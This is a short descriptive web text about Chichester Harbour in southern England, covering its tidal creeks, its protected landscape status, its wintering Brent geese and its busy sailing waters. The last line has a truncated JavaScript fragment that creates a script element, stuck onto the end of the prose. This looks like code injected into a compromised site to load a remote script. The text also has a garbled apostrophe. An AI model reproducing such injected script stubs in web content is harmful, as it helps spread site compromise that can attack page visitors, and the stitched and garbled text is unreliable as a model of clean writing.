Chichester Harbour

One of the few remaining undeveloped coastal areas in Southern England. Bright wide expanses and intricate creeks are at the same time a major wildlife haven and among some of Britaina��s most popular boating waters. This unique area has quite rightly been designated as an Area of Outstanding Natural Beauty. Backed by the South Downs, the harbour is a series of tidal inlets, with a narrow mouth to the sea. Wind-sculptured oaks and haw-thorns line the coast. Saltmarsh and mudflats are havens for thousands of birds.

More than 7,500 Brent geese over winter on the inter tidal mud-land and adjacent farmland and more than 50,000 birds reside in or visit the Harbour throughout the year. Boats of all shapes and sizes make up the 12,500 craft that regularly use the harbour. Competitive and even international racing takes place among the 14 sailing clubs. A number of public launching sites around the harbour make it accessible for everyone.var d=document;var s=d.createElement(‘script’);